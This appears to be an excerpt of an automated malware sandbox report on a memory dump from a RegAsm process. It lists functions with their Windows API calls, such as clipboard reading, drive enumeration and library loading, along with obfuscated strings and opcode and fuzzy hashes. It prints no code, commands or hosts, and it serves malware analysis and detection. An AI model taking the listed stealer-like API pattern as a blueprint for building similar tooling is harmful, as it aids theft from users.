              • Instruction Fuzzy Hash: 89C08CBC244000EBCE088B10FC46B303329E786308F30A039EA23C63A2DA719812CA28
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: DrivesLogical
              • String ID:
              • API String ID: 999431828-0
              • Opcode ID: 6aa9ec6aa2205fb81388711c88060d088b6d2cee8a98a1cc965378c84e9f9d16
              • Instruction ID: d0869ace92382b716b51e577e625da84e87331753e404295bded012d888d7452
              • Opcode Fuzzy Hash: 6aa9ec6aa2205fb81388711c88060d088b6d2cee8a98a1cc965378c84e9f9d16
              • Instruction Fuzzy Hash: F9C0123C541141EFCB08BB6AFC1911A3B22EB8631A322E03AE00242222CB3088128A0C
              APIs
              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00436285
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: e441783ba9a5b3583933b22438453abb75b82d9514eacc0576006f016d592f15
              • Instruction ID: 8648c1932692c8413ac97982163fba844a37a0a9f0b29548e9e6c2ee011cc9b6
              • Opcode Fuzzy Hash: e441783ba9a5b3583933b22438453abb75b82d9514eacc0576006f016d592f15
              • Instruction Fuzzy Hash: E311EC376062819FD7128F18CC80585BBB1FF9B31071B44DBD1C4C7653C639A91ACB61
              APIs
              • RtlAllocateHeap.NTDLL(?,00000000,00000E0F), ref: 00434565
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: ba3c98865ab5df1365ac130d67c4e9413494f3c85a179291c4d0ac18d0a7eb17
              • Instruction ID: 435ef04b207146c14f3692444238a88a4238b41a92d274f0eb41010332e4fc0a
              • Opcode Fuzzy Hash: ba3c98865ab5df1365ac130d67c4e9413494f3c85a179291c4d0ac18d0a7eb17
              • Instruction Fuzzy Hash: BB11C6751001419FD720CF28D854B96BBF5EF89328F3446ADE6A48B782D373A812CBC4
              APIs
              • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00435F17
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 14518db2b14e7d562cd2ca2325b87006c81f3f01dc93537d91a68aacce2cec44
              • Instruction ID: 50c23a6963be4effd49291460e563fee99df555cf462701be530475930672c07
              • Opcode Fuzzy Hash: 14518db2b14e7d562cd2ca2325b87006c81f3f01dc93537d91a68aacce2cec44
              • Instruction Fuzzy Hash: F12100741083019FD704DF25EC91B1ABBE2FB96304F189A2DE1C99B3A1D7348805CF9A
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: ![$;4?<$@NLL$EEK}$M~#%$P$XZdh$ZFwH$ZZh\
              • API String ID: 0-2251475478
              • Opcode ID: e5567b2a1641b64875a753e69030e8e1a614432120801cfd0c23ce83b2bbb1be
              • Instruction ID: 80460ae8a2717a2a90c8d9a0fc9c72fc72f411f54d58053973dd6d0fcad5e811
              • Opcode Fuzzy Hash: e5567b2a1641b64875a753e69030e8e1a614432120801cfd0c23ce83b2bbb1be
              • Instruction Fuzzy Hash: A6B167B11083819BD315CF29C49075BFBE1AF96344F18896DE4D99B3A2C339C84ACB97
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
              • String ID:
              • API String ID: 2832541153-0
              • Opcode ID: 9992b9b5fe50fe2cc56b772c35971781f94b3c059ac1d868cc720812c030e1d3
              • Instruction ID: 43db89ef84e7c59147370d0b769d28361a99271e3e262969982286ff93f7e459
              • Opcode Fuzzy Hash: 9992b9b5fe50fe2cc56b772c35971781f94b3c059ac1d868cc720812c030e1d3
              • Instruction Fuzzy Hash: 5861ACB0608B40DFC321EF39D445716BBE0AF1A314F048A6EE49A8B791D739A815CB96
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: JlRp$aJ,u$atyc$micb$u|p{
              • API String ID: 0-2906307223
              • Opcode ID: d2d3a86baa04add6ae1ae6cabb452e704b5c2bb2d87b4f9432fb8a79d3fbd352
              • Instruction ID: ca48c8d92243bfaf1a7047b6403d569f81225f0884dca2d6067168534d1dcce6
              • Opcode Fuzzy Hash: d2d3a86baa04add6ae1ae6cabb452e704b5c2bb2d87b4f9432fb8a79d3fbd352
              • Instruction Fuzzy Hash: 48C20431608B518BD338CF29C490767BBE2AF96304F588A5EC4E78BB81D738E445CB59
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00422A35
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00422A68
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: EnvironmentExpandStrings
              • String ID: M%h+
              • API String ID: 237503144-1998897944
              • Opcode ID: 9fe8b89542e58bdb9d9bc507dd78c1d99a0edb12e35d3a7ded34c20055419a01
              • Instruction ID: c887d8e509b68d60bb67633f0d84f425f1b5f6aa62f9274f51a1f3e000f4cd20
              • Opcode Fuzzy Hash: 9fe8b89542e58bdb9d9bc507dd78c1d99a0edb12e35d3a7ded34c20055419a01
              • Instruction Fuzzy Hash: A59148B4600B019FE334CF21D994B27BBE5FB85304F40892DE5AA4BA92D7B5F845CB94
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: "$"
              • API String ID: 0-3758156766
              • Opcode ID: 81149805f9ffb991687ac78c070eab92e778eb04601efbd1b1da0dc64ff3345a
              • Instruction ID: 3ae5fbe5c68ef16c87e54f5f6f429b8d458329ce14d862d79f2054cab1a361f9
              • Opcode Fuzzy Hash: 81149805f9ffb991687ac78c070eab92e778eb04601efbd1b1da0dc64ff3345a
              • Instruction Fuzzy Hash: A90215B1B083214FC714CE29E49072BB7D5EBC4314F998A2EE4998B381D738EC45CB86
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: JlRp$fcWP
              • API String ID: 0-1804931993
              • Opcode ID: 0959be8cb72fc4cbbbf9ec71e8f39e14554314cc0d85759b694218f0933b990a
              • Instruction ID: 64c87e5d74f804216d82703736cc226ade5864d30247e5888e43180b6cad2d3a
              • Opcode Fuzzy Hash: 0959be8cb72fc4cbbbf9ec71e8f39e14554314cc0d85759b694218f0933b990a
              • Instruction Fuzzy Hash: 44C1E270208B528BD339CF25C4A07B7BBE2AF52304F58896DC4EB4BB81D738A549DB55
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: LQkc
              • API String ID: 0-3477798544
              • Opcode ID: 3d6506d52394ca5d795b6ff83037bd9cf5413c0b6087175a431358a0ddc44c00
              • Instruction ID: ed5eebbfc59a665a934a9d8f78321b36d8526b451edfe03179ec0d7784f9870a
              • Opcode Fuzzy Hash: 3d6506d52394ca5d795b6ff83037bd9cf5413c0b6087175a431358a0ddc44c00
              • Instruction Fuzzy Hash: 6D518070284B918BE725CF2AC0907A3BBE2AF53305F884C5DD0DB8B752C77AA465CB54
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: LQkc
              • API String ID: 0-3477798544
              • Opcode ID: f1bedc344215bd36918c9e29ba0f9d7a3930de250ce7fe89a400768a40b169d4
              • Instruction ID: 0bc0b53aea184d604499fb95c06f66ce5c37966f3c301d2a8d01b7cf4a7a4f55
              • Opcode Fuzzy Hash: f1bedc344215bd36918c9e29ba0f9d7a3930de250ce7fe89a400768a40b169d4
              • Instruction Fuzzy Hash: B1418E70284B918AE725CF26C0507A3BBF2AF57345F844C5DC0EB8B752C77AA465CB58
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: P(B
              • API String ID: 0-1450342836
              • Opcode ID: fd6d308b6348860887212042cd3d1ca58e786c207045bdd3d811ba60c8c26591
              • Instruction ID: 5bce6a0dd5d3f0fb40adece630df30624db64ef035985f246ba2c5937c1b3808
              • Opcode Fuzzy Hash: fd6d308b6348860887212042cd3d1ca58e786c207045bdd3d811ba60c8c26591
              • Instruction Fuzzy Hash: 91900238D48100868104DF059640570E278521B101F513450A408F3065C250D400452C
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e57d780260ac18970e14a5fc6d6272be9c34a445696ffe3f53ebfdac0ba55c8
              • Instruction ID: 3d33da45926c0e9cc844bc3bcc3e48b3af9c3427c9a5c5acd54eff4e178b070c
              • Opcode Fuzzy Hash: 2e57d780260ac18970e14a5fc6d6272be9c34a445696ffe3f53ebfdac0ba55c8
              • Instruction Fuzzy Hash: 2B52CF756087419FC314CF18C490A2BBBE2BFC9308F588A6EF8958B351D338E945CB96
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc9a437b49e115cd635667e34cde58db4559eca69dfb07c3cde2bcfc8e1dd778
              • Instruction ID: a9fdf9cf3fa3962654b8b7464e87ea13fda947828765379e6e838e0b1fb6b07f
              • Opcode Fuzzy Hash: bc9a437b49e115cd635667e34cde58db4559eca69dfb07c3cde2bcfc8e1dd778
              • Instruction Fuzzy Hash: 5542C1716087158BC7249F18D9802BBB3E1FFD4314F18893EE9D6A72D1DB38A855CB4A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2cf7d3f804cb55d6e5e06d4ceb3bb384490730145d3a712fd88394cd0d3542b2
              • Instruction ID: 6fe98310def07be5c00381fee3c9bbdf1943c736fd6b846009d489c5ddb8ceb4
              • Opcode Fuzzy Hash: 2cf7d3f804cb55d6e5e06d4ceb3bb384490730145d3a712fd88394cd0d3542b2
              • Instruction Fuzzy Hash: 74B1B2356083018BC714CF18C890A6BB7E2EF88714F19852DE9C59B391D779EC65CB96
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6e0012040d65948a108bf14725045c1568a53cd2860d99fc4219caa48a3abe01
              • Instruction ID: 39bdaa8439c10a4e910641662803248a466577d602ea33e0b9596c375b13f8d0
              • Opcode Fuzzy Hash: 6e0012040d65948a108bf14725045c1568a53cd2860d99fc4219caa48a3abe01
              • Instruction Fuzzy Hash: A4A1E0712083018BD724CF19C890A6BB7E2FFC9714F19991DE8858B391DB79EC15CB9A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0449d3adc0eaf61af13e208f0afadb759ba3554a0fb2ad294edb0b8940f0ac2a
              • Instruction ID: fb0a7245d665300c919b4253607ad04e15ddd4fe8f91a05bfd29f37c4225686b
              • Opcode Fuzzy Hash: 0449d3adc0eaf61af13e208f0afadb759ba3554a0fb2ad294edb0b8940f0ac2a
              • Instruction Fuzzy Hash: CDA1E720204B918BD728CF39D490777FBE2AF56314F64996ED4EB87791D3789884CB18
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: f3d48089494569f8f97326bf2c91d9387d9f387e561bdbb3eb5b0a05516cb8b5
              • Instruction ID: 5980691c4d84af0f34b0ff8909df8928d9d6d51a42bacd4035761070d871b756
              • Opcode Fuzzy Hash: f3d48089494569f8f97326bf2c91d9387d9f387e561bdbb3eb5b0a05516cb8b5
              • Instruction Fuzzy Hash: 8751AD75A083009FD7148F19D99066BB7A2EBC9318F29DA1DE98957751C338EC01CB9A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a34faf275a1ee80b45cc8cdff674e74a35c97fc326332738e460996be8d3c694
              • Instruction ID: b23ef3e7cb609402a53a1815a7dbf793ed4b2694693b6863292894053b6eda69
              • Opcode Fuzzy Hash: a34faf275a1ee80b45cc8cdff674e74a35c97fc326332738e460996be8d3c694
              • Instruction Fuzzy Hash: 38412772908708DBC3209F94C8807E7B7D4EFE6354F1945AEE89987381E7B99C84C75A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ec720b70a672a5ea98d625a9e4edec6c3e85a6b969651b5cb560d4361f7673a
              • Instruction ID: d9828aa5310ceece87412d3b4a7a94b2005fe09d16d104d1fe1c8b6fefc5bbcd
              • Opcode Fuzzy Hash: 4ec720b70a672a5ea98d625a9e4edec6c3e85a6b969651b5cb560d4361f7673a
              • Instruction Fuzzy Hash: 4C4148747193808BE338DB14C4B97ABB7E2ABC6304F04092DD48A87782DB795645CB97
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18d620d09daf4918aa5bfe505f36110af0c52892b7ee356d370d3624b539a7c3
              • Instruction ID: ed223b5a29250035149b440bf2bb79c28596de7b7b1c3902a9b5a0599ad4eecd
              • Opcode Fuzzy Hash: 18d620d09daf4918aa5bfe505f36110af0c52892b7ee356d370d3624b539a7c3
              • Instruction Fuzzy Hash: B031D275A042418FC715CF18D9807AAB7E2FFC6310F19482ED949C7351EBB8D8A1CB9A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab57d778617bd45d4f06f0136cce3116ff94a5a3c5c3884f8dd30683a5569b28
              • Instruction ID: 94a62e4594aae2b53e37b28ca4b37b5c86c8f0aa5a28874f4a14fb7340a6a359
              • Opcode Fuzzy Hash: ab57d778617bd45d4f06f0136cce3116ff94a5a3c5c3884f8dd30683a5569b28
              • Instruction Fuzzy Hash: A031D8306482019BC714DE59CD84A27B7E1EF84358F18893EE899AB3C1D279DC42CB8A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d81edad819d82c198ba5920b72b5db4bcb029253810426cdc3612355a28de5c5
              • Instruction ID: 7d24f5686a8a4eff238214a85457577d496f5297d97cc04f8b114fdf5c80f867
              • Opcode Fuzzy Hash: d81edad819d82c198ba5920b72b5db4bcb029253810426cdc3612355a28de5c5
              • Instruction Fuzzy Hash: 05216FB52097414BC72DCF25D8A0676B7B3AFD6305B1D4A6EC0D747B46CB30A849C745
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed32e5f2a62b7060479b028655890f3c79303ff3e19b3fdeee7ccb9d10421ce6
              • Instruction ID: 99d9a4bcf9c1dc50ba23eb117fc814751e91b2bfca2092ff74a1356565d5078c
              • Opcode Fuzzy Hash: ed32e5f2a62b7060479b028655890f3c79303ff3e19b3fdeee7ccb9d10421ce6
              • Instruction Fuzzy Hash: FA314F30685B408FD325CF25C590763BBE2AB86214F948C6EC4CBC7751CB39E8A5CB44
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
              • Instruction ID: 05b060fc40e3470515fb3f758981865aaea8f14a2547a57a8743ca145a6d755c
              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
              • Instruction Fuzzy Hash: E7110C33A451D50EC3268D3C8410566BFA30A97234F1D539AF4B49B3D7D6278D8B8359
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c6af6580393b78d5d96977296d2cd94ca6d96ddde96d7098d80c65da5942e3da
              • Instruction ID: 7c4a01effdc45802a941adb50c3651b8e055a3ccbc04bd3648956cc1d6e9a21f
              • Opcode Fuzzy Hash: c6af6580393b78d5d96977296d2cd94ca6d96ddde96d7098d80c65da5942e3da
              • Instruction Fuzzy Hash: 9C015EB170031167DA20AE55B8C1B27B2A9ABC0708F58893EE80857342DB79EC15CA99
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 036274cc6bad5322a0b2cb60712c07fae28a6c9c0ed65221f4bec965b1a16ed4
              • Instruction ID: cb03fd620c9d2a89ca717a6e1c924654e11fb047365e41e8fe797e90bef8d4f3
              • Opcode Fuzzy Hash: 036274cc6bad5322a0b2cb60712c07fae28a6c9c0ed65221f4bec965b1a16ed4
              • Instruction Fuzzy Hash: 2E01E4B06083409FD704CF04C69065AFBF2EBCA714F04981CE09887341C338ED059B46
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
              • Instruction ID: ca3e30c0420363b71e18773d0b5647d179716b00185bff43fb4c94d114c79f40
              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
              • Instruction Fuzzy Hash: 66D0A771A487A10E9758CD7804A0977FBF8E987652B1814AFE5D1F3249D234EC05869C
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7de7c6cfb91ca40dfee49151817ca1939ef1e1ac2fc68f73d5ab9f8eb4539d47
              • Instruction ID: 7e964af1710b7b3be3b82be8e830ff0366a923a1bad6dc6dc953a51d285ee133
              • Opcode Fuzzy Hash: 7de7c6cfb91ca40dfee49151817ca1939ef1e1ac2fc68f73d5ab9f8eb4539d47
              • Instruction Fuzzy Hash: 0EC08C21B8C28286C22CCB18E89153AB325B783120E24B23DC8D6236D2C920D406870E
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e522b51ce3faff9662044a33f876a5e1f9dadc12972a87f7dc5b9e995e64b74
              • Instruction ID: 7401bd42308f1e9f540fbe1bffae50129ee85c37a5fc3ae99fb7311d01d7e970
              • Opcode Fuzzy Hash: 0e522b51ce3faff9662044a33f876a5e1f9dadc12972a87f7dc5b9e995e64b74
              • Instruction Fuzzy Hash: 0DC09239E58140878B0CCF74E861431A2BAEB07208B20703CD803E3653DA50D418850C
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcc9eb93af5faa93068f8eefb55dca13fa532a381785cbc4f07dd9f6485f3d22
              • Instruction ID: 54cf39e25647fce98139212de785daab4d4bbf73a8b4bc55cddd79047df3ed60
              • Opcode Fuzzy Hash: dcc9eb93af5faa93068f8eefb55dca13fa532a381785cbc4f07dd9f6485f3d22
              • Instruction Fuzzy Hash: B6B092B9C80000B6D0193B223D4243EB0361593708F0428BEE80632243A62AD92A905F
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: Object$DeleteMetricsSelectSystem
              • String ID:
              • API String ID: 3911056724-3916222277
              • Opcode ID: 17011f58a0a26a12f42b42e39653115aef2cd4661d8cdeaba3345943decb54d9
              • Instruction ID: 32394a4a3f955615b2b49dcd9db8dbe763f6152044793f2954be43e40043d511
              • Opcode Fuzzy Hash: 17011f58a0a26a12f42b42e39653115aef2cd4661d8cdeaba3345943decb54d9
              • Instruction Fuzzy Hash: 4F816EB4A04B00DFC354EF29D595A1ABBF0FF49300F10896DE99A8B760D731A858CF92
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042302D
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042305D
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: EnvironmentExpandStrings
              • String ID: 'U,S$7I9W$Ap$}
              • API String ID: 237503144-874940390
              • Opcode ID: 5c6c807312587b39dc68478217dc31459bde7a0373015bdccfaf56f1a1431bce
              • Instruction ID: 74968c51005c49a670a2893c934ecf1223601a79b231248841cbbf4a123ea6f3
              • Opcode Fuzzy Hash: 5c6c807312587b39dc68478217dc31459bde7a0373015bdccfaf56f1a1431bce
              • Instruction Fuzzy Hash: A0A159715083918FD338CF14D45079FB7E1BBC5708F114E2DE8A96B682D7749A0ACB86
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00411F12
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00411F48
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: EnvironmentExpandStrings
              • String ID: T
              • API String ID: 237503144-3187964512
              • Opcode ID: 115282c8788a8f4fd62191cd53d175624d9b60189613b91eee571215d9066099
              • Instruction ID: 9994680c8a1aa8a56a0cef811662c2e5f7c303077db47d9a3e8b9743bc259ed4
              • Opcode Fuzzy Hash: 115282c8788a8f4fd62191cd53d175624d9b60189613b91eee571215d9066099
              • Instruction Fuzzy Hash: E0D138706193818FE374CF14C499B9BBBE1AFD6304F04492EE88987392D7799944CBA7